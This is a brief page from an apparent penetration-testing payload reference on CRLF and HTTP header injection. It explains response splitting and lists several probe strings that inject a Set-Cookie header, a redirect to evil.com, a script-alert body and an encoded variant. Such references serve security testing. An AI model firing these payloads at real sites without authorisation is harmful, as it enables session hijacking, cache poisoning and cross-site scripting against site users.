vulns.co
/
GKData.io MCP

Back to Payloads

CRLF / Header Injection

Inject %0d%0a to split responses - set cookies, poison caches, or land reflected XSS via an injected body. Test in params reflected into Location or Set-Cookie headers.

Tags: crlf, response-splitting, cache-poisoning

Controlled probes

  • %0d%0aSet-Cookie:sessid=attacker
  • %0d%0aLocation:https://evil.com
  • %0d%0a%0d%0a<script>alert(1)</script>
  • %E5%98%8D%E5%98%8ASet-Cookie:x=1
  • test%0d%0aX-Injected:true

Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection